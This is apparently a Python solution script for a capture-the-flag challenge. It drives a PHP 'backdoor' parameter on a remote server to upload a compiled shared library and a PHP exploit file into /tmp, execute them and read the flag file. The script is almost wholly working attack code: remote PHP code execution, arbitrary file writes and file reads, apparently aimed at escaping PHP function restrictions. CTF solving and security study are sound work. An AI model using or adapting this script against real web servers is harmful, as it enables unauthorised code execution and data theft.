#!/usr/bin/env python
# coding: utf-8
# gcc -shared -fPIC exp.c -o png.so
import requests
import base64

session = requests.Session()
# target = "http://111.186.63.208:31340/index.php"
target = "http://ctf.momomoxiaoxi.com:8888/index.php"
headers = {"Cache-Control":"max-age=0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36","Connection":"close","Accept-Language":"zh-CN,zh;q=0.9,en;q=0.8","Content-Type":"application/x-www-form-urlencoded"}
proxies = {"http":"http://127.0.0.1:7890"}
userhash = '8f10f5b0ed8b32372911c55aa59344b4'

def exp(payload):
    paramsPost = {"backdoor":payload}
    #response = session.post(target,proxies=proxies, data=paramsPost, headers=headers)
    response = session.post(target, data=paramsPost, headers=headers)
    print("Status code:   %i" % response.status_code)
    print("Response body: %s" % response.content)


def put_file(filename):
	with open(filename, "rb") as f:
		data = f.read().replace('{REPLACE_BASEDIR}', '/tmp/{}'.format(userhash))
    	content = base64.b64encode(data).decode("utf-8")

	payload  = 'echo file_put_contents("/tmp/{}/{}",base64_decode("{}"));'.format(userhash, filename, content)
	# print(payload)
	exp(payload)


def get_file(filename):
	payload = 'var_dump(file_get_contents("/tmp/{}/{}"));'.format(userhash, filename)
	exp(payload)


def main():
	put_file('png.la')
	put_file('png.so')
	put_file('exploit.php')
	# get_file('exploit.php')
	# payload = open('exploit.php').read().replace('<?php', '').replace('?>', '')
	payload  = 'echo 1337;require "/tmp/{}/exploit.php";echo 1338;'.format(userhash)
	exp(payload)
	get_file('flag'.format(userhash))
	# get_file('/var/www/html/index.php')

if __name__ == '__main__':
	main()